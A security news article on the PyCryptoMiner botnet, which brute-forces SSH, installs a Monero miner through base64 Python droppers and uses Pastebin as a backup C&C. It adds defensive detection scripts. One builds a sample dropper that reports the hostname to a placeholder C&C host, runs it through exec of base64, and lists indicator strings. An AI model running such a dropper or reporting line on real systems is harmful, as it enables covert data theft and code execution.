PyCryptoMiner

Experts believe that an experienced cybercrime group has created a botnet from compromised Linux-based systems and is using these servers and devices to mine Monero, a digital currency.

Crooks are apparently using brute-force attacks against Linux systems that feature exposed SSH ports. If they guess the password, they use Python scripts to install a Monero miner.

According to experts from F5 Networks, attackers have also started using an exploit for the JBoss application server (CVE-2017-12149) to break into vulnerable servers, but SSH brute-force attacks remain this new botnet's bread and butter.
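Because the botnet's main entry point is guessing SSH passwords, the first place a defender will see it is the sshd log. The script below is an added example, not code from the article or from F5: it parses constructed auth.log-style lines (sample data, documentation IP ranges) and raises a brute-force alert for any source that racks up repeated "Failed password" messages, escalating it when the same source afterwards gets an "Accepted password" login, which is exactly the sequence that precedes the miner install. The threshold and severity labels are the example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample of sshd messages in /var/log/auth.log format (rsyslog on
# Debian/Ubuntu). Addresses are documentation ranges; this is not real data.
SAMPLE_AUTH_LOG = """\
Jan  2 10:00:01 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 51234 ssh2
Jan  2 10:00:02 web1 sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 51240 ssh2
Jan  2 10:00:03 web1 sshd[2105]: Failed password for root from 203.0.113.7 port 51244 ssh2
Jan  2 10:00:04 web1 sshd[2107]: Failed password for invalid user test from 203.0.113.7 port 51250 ssh2
Jan  2 10:00:05 web1 sshd[2109]: Failed password for root from 203.0.113.7 port 51256 ssh2
Jan  2 10:00:06 web1 sshd[2111]: Accepted password for root from 203.0.113.7 port 51260 ssh2
Jan  2 10:03:10 web1 sshd[2130]: Failed password for alice from 198.51.100.2 port 40001 ssh2
Jan  2 10:03:20 web1 sshd[2131]: Accepted publickey for alice from 198.51.100.2 port 40002 ssh2
"""

# "invalid user" appears when the account does not exist on the host; the
# optional group swallows it so the username is captured either way.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>password|publickey) for (?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def analyze_auth_log(text, threshold=5):
    """Summarise sshd failures per source IP and return a list of alerts.

    A source with at least `threshold` failed password attempts is reported as
    brute_force; if the same source later gets an Accepted *password* login it
    is escalated to likely_compromise. Threshold and labels are this example's
    own assumptions, not a published detection rule.
    """
    failures = defaultdict(int)
    tried_users = defaultdict(set)
    password_logins = defaultdict(list)

    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m["ip"]] += 1
            tried_users[m["ip"]].add(m["user"])
            continue
        m = ACCEPTED_RE.search(line)
        # Key-based logins are not the outcome of password guessing, so only
        # password successes count towards escalation.
        if m and m["method"] == "password":
            password_logins[m["ip"]].append(m["user"])

    alerts = []
    for ip, count in failures.items():
        if count < threshold:
            continue
        severity = "likely_compromise" if password_logins[ip] else "brute_force"
        alerts.append({
            "ip": ip,
            "failures": count,
            "users_tried": sorted(tried_users[ip]),
            "succeeded_as": password_logins[ip],
            "severity": severity,
        })
    return alerts


if __name__ == "__main__":
    for alert in analyze_auth_log(SAMPLE_AUTH_LOG):
        print(alert)
```

On a real host, feed it the contents of /var/log/auth.log (or `journalctl -u ssh` output on systemd systems). The more durable fix is to not be guessable at all: set `PasswordAuthentication no` and `PermitRootLogin no` (or `prohibit-password`) in sshd_config, at which point the "Accepted password" branch above can never fire.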

Python scripts are harder to detect

What sets this botnet apart from the other Monero-mining botnets that have appeared in recent months is that it relies on Python scripts rather than on compiled malware binaries.

"Unlike a binary malware alternative, a scripting language-based malware is more evasive by nature as it can be easily obfuscated," F5 experts say. "It is also executed by a legitimate binary, which could be one of the PERL/Python/Bash/Go/PowerShell interpreters shipped with almost every Linux/Windows distribution."

Despite this evasiveness, once researchers obtained samples of the malware, its construction turned out not to be very complex.

How the PyCryptoMiner malware works

Experts say that after gaining access to a victim, the crooks download an initial, very simple base64-encoded "spearhead" Python script that gathers information about the victim's system and reports it to a remote C&C server.

The server replies with a second Python script in the form of a Python dictionary file that installs a version of the open-source Minerd Monero mining client.
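The two traits described above (a base64-encoded script, run by a legitimate interpreter rather than a dropped binary) are also what a defender can key on: the payload has to appear on the interpreter's command line or be decoded by it at some point. The following is an added example, not code from the article or from F5, of a process-list check that finds interpreter invocations carrying a long base64 blob, decodes it, and flags it when the decoded text contains networking or miner-related strings. The spearhead stand-in, the process list and the indicator list are all constructed for illustration; the hostname `c2.example` is a placeholder and the indicators are not a published signature set.

```python
import base64
import binascii
import re

# Constructed stand-in for the "spearhead" stage: a short script that collects
# host details and reports them to a remote server. The hostname is a
# placeholder; no real C&C address is used.
SAMPLE_SPEARHEAD = (
    "import platform, urllib2\n"
    "info = platform.uname()\n"
    "urllib2.urlopen('http://c2.example/report?h=' + info[1])\n"
)
_ENCODED = base64.b64encode(SAMPLE_SPEARHEAD.encode()).decode()

# Constructed process list, as `ps -eo args --no-headers` would print it.
# The last entry is a benign long token that decodes fine but carries no code.
SAMPLE_PROCESS_LIST = [
    "/usr/bin/python3 /opt/app/manage.py runserver 0.0.0.0:8000",
    "sshd: alice [priv]",
    "python -c \"import base64;exec(base64.b64decode('%s'))\"" % _ENCODED,
    "python3 deploy.py --token " + "A" * 44,
]

# Scripting interpreters a dropper would hand its payload to. Version suffixes
# (python2.7, python3) are allowed; names that merely start with "sh" are not.
INTERP_RE = re.compile(r"^(python|perl|bash|sh|dash|ruby|php)[\d.]*$")
# A run of base64 alphabet long enough to carry code rather than a short token.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Assumed indicator strings for illustration; not a published signature set.
SUSPICIOUS_TOKENS = ("urlopen", "urllib", "socket", "minerd", "stratum",
                     "subprocess", "os.system", "exec(")


def decode_blob(blob):
    """Return the blob decoded as UTF-8 text, or None if it is not base64 text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def inspect_cmdline(cmdline):
    """Return a finding for one command line, or None if nothing suspicious."""
    argv = cmdline.split()
    if not argv:
        return None
    argv0 = argv[0].rsplit("/", 1)[-1]
    if not INTERP_RE.match(argv0):
        return None
    for blob in B64_RE.findall(cmdline):
        decoded = decode_blob(blob)
        if decoded is None:
            continue
        hits = [t for t in SUSPICIOUS_TOKENS if t in decoded]
        if hits:
            return {"interpreter": argv0, "indicators": hits, "decoded": decoded}
    return None


def scan_process_list(cmdlines):
    """Run inspect_cmdline over every line and collect the findings."""
    return [f for f in (inspect_cmdline(c) for c in cmdlines) if f]


if __name__ == "__main__":
    # On a live host, replace SAMPLE_PROCESS_LIST with the lines of
    # `ps -eo args --no-headers` or with execve records from auditd.
    for finding in scan_process_list(SAMPLE_PROCESS_LIST):
        print(finding["interpreter"], finding["indicators"])
        print(finding["decoded"])
```

This catches the simplest delivery, where the encoded script rides on the command line. A stage that is instead written to disk or piped over stdin leaves no blob in `ps` output, so pair this with execve auditing (auditd or eBPF-based tooling) and watch for interpreters spawning network connections or a miner process.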

Experts say they identified two Monero wallets used by this botnet, which they named PyCryptoMiner. One contained 94 Monero and the second contained 64 Monero, for an approximate total of $60,000.

Botnet tied to old threat actor

Further, researchers said that the C&C domain names used by PyCryptoMiner were registered by an individual who was tied to over 36,000 domain names and 234 other email addresses, all used for domains involved in scams, gambling, and adult services.

Researchers also found it interesting that PyCryptoMiner used a hard-coded Pastebin link to retrieve the address of a backup C&C server whenever the main domain was down.

Experts say this Pastebin URL was viewed more than 175,000 times. That figure is not the botnet's real size, since each bot may have fetched the page many times; a clearer indicator was the daily increase of around 1,000 views.

This is a very small Monero-mining botnet, but it was still enough for its operators to make over $60,000, which shows how popular and profitable such botnets are at the moment. Earlier this week, when F5 researchers published their findings, the botnet was down and out of service.

In recent months, Monero-mining malware has become quite popular. Excluding cryptojacking events —which also mine Monero— some of the Monero-mining malware families and botnets we've seen in 2017 include Digmine, an unnamed botnet targeting WordPress sites, Hexmen, Loapi, Zealot, WaterMiner, an unnamed botnet targeting IIS 6.0 servers, CodeFork, and Bondnet.
